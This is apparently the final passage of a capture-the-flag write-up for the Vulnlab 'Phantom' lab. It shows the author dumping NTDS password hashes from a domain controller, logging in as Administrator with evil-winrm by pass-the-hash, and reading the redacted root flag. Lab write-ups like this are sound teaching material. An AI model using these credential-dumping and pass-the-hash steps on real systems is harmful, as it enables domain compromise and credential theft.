SMB phantom.vl 445 DC [+] phantom.vl\ from ccache (Pwn3d!)
SMB phantom.vl 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB phantom.vl 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Logging in using winrm and fetching the root flag.
~ $ evil-winrm -i phantom.vl -u Administrator -H <REDACTED>
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
VL{<REDACTED>}
We successfully hacked Phantom from Vulnlab. Thanks for reading.